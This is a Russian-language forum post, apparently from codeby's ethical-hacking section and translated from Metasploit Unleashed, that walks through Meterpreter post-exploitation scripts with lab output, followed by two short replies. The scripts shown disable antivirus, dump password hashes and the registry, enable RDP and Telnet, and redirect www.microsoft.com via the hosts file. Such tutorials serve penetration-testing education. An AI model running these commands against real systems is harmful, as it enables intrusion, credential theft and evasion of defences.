1. Спонсор публикаций Marketplace codeby. Сервис, который так долго ждали. При расчетах используем биткоин. Первый товар уже в продаже: Консультация на тему ИБ от Ondrik8

    Скрыть объявление
  2. Спонсор публикаций Marketplace codeby. Сервис, который так долго ждали. При расчетах используем биткоин. Второй товар маркетплейса: Надёжная обфускация вашей программы от PingVinich

    Скрыть объявление

Основы работы в meterpreter (Metasploit Часть1)

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Pushkinmazila, 7 фев 2017.

?

Есть ли смысл писать дальше ?

  1. Да

    78 голосов
    97,5%
  2. Нет

    2 голосов
    2,5%
  1. Pushkinmazila

    Pushkinmazila Active Member

    Репутация:
    0
    Регистрация:
    20 ноя 2016
    Сообщения:
    32
    Симпатии:
    14
    «Чтобы двигаться в будущее нужно вернуться в прошлое»
    Основы работы в meterpreter (Metasploit Часть1)

    В этой статье мы вновь вернемся назад и узнаем об основах работы в meterpreter, ибо очень много информации есть как получить сессию, а вот что дальше делать с этим инфы мало)

    Вот сейчас мы пройдемся с начала по Скриптам а потом и до Команд дойдем.

    С приблизительной русификацией (то что смог)

    Metasploit
    Metasploit поставляется с тоннами полезных скриптов и команд, которые могут помочь вам в исследованиях. Скрипты, как правило, сделаны третьими сторонами и в конечном итоге принимаются в хранилище Subversion. Мы будем рассматривать некоторые из них и описывать их назначения.
    Скрипты и команды, указанные ниже, предназначены для использования с оболочкой Meterpreter после успешного получения сессии. После того, как вы получили сессию вы можете использовать эти скрипты и команды, чтобы наилучшим образом действовать в системе.

    Скрипты

    1) checkvm
    Скрипт под названием “checkvm” которое говорит само за себя предназначен для проверки наличия у цели виртуальных машин
    Код (Text):

     meterpreter > run checkvm
     
     [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
     [*] This is a VMware Workstation/Fusion Virtual Machine
     

    2) getcountermeasure

    Скрипт ‘getcountermeasure’ проверяет установки безопасности на целевой системе и может отрубить (мало вероятно)
    Код (Text):

      meterpreter > run getcountermeasure
     
     [*] Running Getcountermeasure on the target...
     [*] Checking for contermeasures...
     [*] Getting Windows Built in Firewall configuration...
     [*]
     [*]     Domain profile configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]     Exception mode                    = Enable
     [*]
     [*]     Standard profile configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]     Exception mode                    = Enable
     [*]
     [*]     Local Area Connection 6 firewall configuration:
     [*]     -------------------------------------------------------------------
     [*]     Operational mode                  = Disable
     [*]
     [*] Checking DEP Support Policy...
     

    3) Getgui

    ‘getgui’ скрипт используется, чтобы включить RDP на целевой системе, если она отключена.
    Код (Text):

     meterpreter > run getgui
     
     Windows Remote Desktop Enabler Meterpreter Script
     Usage: getgui -u  -p

     
     OPTIONS:
     
     -e   Enable RDP only.
     -h   Help menu.
     -p   The Password of the user to add.
     -u   The Username of the user to add.
     
     meterpreter > run getgui -e
     
     [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
     [*] Carlos Perez carlos_perez@darkoperator.com
     [*] Enabling Remote Desktop
     [*] RDP is already enabled
     [*] Setting Terminal Services service startup mode
     [*] Terminal Services service is already set to auto
     [*] Opening port in local firewall if necessary
     

    4) get_local_subnets

    ‘get_local_subnets’ скрипт используется, чтобы получить локальную маску подсети жертвы. Это может оказаться очень полезной информацией, чтобы иметь информацию для действий.
    Код (Text):

     meterpreter > run get_local_subnets


     Local subnet: 10.211.55.0/255.255.255.0

     

    5) gettelnet

    ‘gettelnet’ скрипт используется, чтобы запустить TELNET на целевой машине, если это там отключено.
    Код (Text):

     meterpreter > run gettelnet


     Windows Telnet Server Enabler Meterpreter Script

     Usage: gettelnet -u  -p



     OPTIONS:


     -e   Enable Telnet Server only.

     -h   Help menu.

     -p   The Password of the user to add.

     -u   The Username of the user to add.


     meterpreter > run gettelnet -e


     [*] Windows Telnet Server Enabler Meterpreter Script

     [*] Setting Telnet Server Services service startup mode

     [*] The Telnet Server Services service is not set to auto, changing it to auto ...

     [*] Opening port in local firewall if necessary

     

    6) hostsedit

    ‘hostsedit’ скрипт Meterpreter для добавления записей в файл hosts Windows.
    Код (Text):

    meterpreter > run hostsedit

     

     OPTIONS:


     -e   Host entry in the format of IP,Hostname.

     -h   Help Options.

     -l   Text file with list of entries in the format of IP,Hostname. One per line.


     Example:


     run hostsedit -e 127.0.0.1,google.com

     run hostsedit -l /tmp/fakednsentries.txt


     meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com

     [*] Making Backup of the hosts file.

     [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back

     [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162

     [*] Clearing the DNS Cache

     

    7) killav

    ‘killav’ скрипт может использоваться, чтобы отключить большинство антивирусных программ (Мало вероятно).
    Код (Text):

     meterpreter > run killav


     [*] Killing Antivirus services on the target...

     [*] Killing off cmd.exe...

     

    8) remotewinenum

    ‘remotewinenum’ скрипт перечислит информацию о системе через wmic на жертве
    Я могу предположить, что

    Код (Text):

    -u administrator -p ihazpassword -t 10.211.55.128
     

    -u administrator Имя пользователя

    -p ihazpassword Пароль пользователя

    -t 10.211.55.128. Адресс в сети

    Код (Text):


    meterpreter > run remotewinenum


     Remote Windows Enumeration Meterpreter Script

     This script will enumerate windows hosts in the target environment

     given a username and password or using the credential under witch

     Meterpreter is running using WMI wmic windows native tool.

     Usage:


     OPTIONS:


     -h   Help menu.

     -p   Password of user on target system

     -t   The target address

     -u   User on the target system (If not provided it will use credential of process)


     meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128


     [*] Saving report to /root/.msf4/logs/remotewinenum/10.211.55.128_20090711.0142

     [*] Running WMIC Commands ....

     [*]     running command wimic environment list

     [*]     running command wimic share list

     [*]     running command wimic nicconfig list

     [*]     running command wimic computersystem list

     [*]     running command wimic useraccount list

     [*]     running command wimic group list

     [*]     running command wimic sysaccount list

     [*]     running command wimic volume list brief

     [*]     running command wimic logicaldisk get description,filesystem,name,size

     [*]     running command wimic netlogin get name,lastlogon,badpasswordcount

     [*]     running command wimic netclient list brief

     [*]     running command wimic netuse get name,username,connectiontype,localname

     [*]     running command wimic share get name,path

     [*]     running command wimic nteventlog get path,filename,writeable

     [*]     running command wimic service list brief

     [*]     running command wimic process list brief

     [*]     running command wimic startup list full

     [*]     running command wimic rdtoggle list

     [*]     running command wimic product get name,version

     [*]     running command wimic qfe list

     

    9) scraper

    Скрипт ‘scraper’ (что кстати можно перевести как 'скребка') логично что может захватить еще больше информации о системе, включая всю регистрацию.
    Код (Text):

    meterpreter > run scraper

     

     [*] New session on 10.211.55.128:4444...

     [*] Gathering basic system information...

     [*] Dumping password hashes...

     [*] Obtaining the entire registry...

     [*] Exporting HKCU

     [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)

     [*] Cleaning HKCU

     [*] Exporting HKLM

     [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)

     

    10) winenum

    Благодаря скрипту‘winenum’ Мы получаем хэш паролей, настройки системы, список пользователей и многое другое.

    Код (Text):

    meterpreter > run winenum


     [*] Running Windows Local Enumerion Meterpreter Script

     [*] New session on 10.211.55.128:4444...

     [*] Saving report to /root/.msf4/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt

     [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........

     [*]     This is a VMware Workstation/Fusion Virtual Machine

     [*] Running Command List ...

     [*]     running command cmd.exe /c set

     [*]     running command arp -a

     [*]     running command ipconfig /all

     [*]     running command ipconfig /displaydns

     [*]     running command route print

     [*]     running command net view

     [*]     running command netstat -nao

     [*] Extracting software list from registry

     [*] Finished Extraction of software list from registry

     [*] Dumping password hashes...

     [*] Hashes Dumped

     [*] Getting Tokens...

     [*] All tokens have been processed

     [*] Done!

     

    Ссылка на источник :: https://www.offensive-security.com/metasploit-unleashed/existing-scripts/

    Вот и все на сегодня народ скоро будет часть где я переведу все что показывает команда help и по ближе познакомимся с самыми интересными (На мой взгляд командами)

    Основы работы в meterpreter (Metasploit Часть1)
     
    #1 Pushkinmazila, 7 фев 2017
    Последнее редактирование: 8 фев 2017
    citizen2517, Fi0d0r, a113 и 8 другим нравится это.
  2. DoberGroup

    DoberGroup Хмурый мизантроп
    Grey Team

    Репутация:
    0
    Регистрация:
    13 ноя 2016
    Сообщения:
    194
    Симпатии:
    116
    Он предназначен для проверки, не находится ли цель внутри виртуальной машины.

    Пункты 9 и 10 поправьте, копи-паст Вас подвел немного
     
    citizen2517, ghostphisher, paragon21 и ещё 1-му нравится это.
  3. Pushkinmazila

    Pushkinmazila Active Member

    Репутация:
    0
    Регистрация:
    20 ноя 2016
    Сообщения:
    32
    Симпатии:
    14
    Все исправил спасибо
     
    citizen2517 нравится это.
Загрузка...

Поделиться этой страницей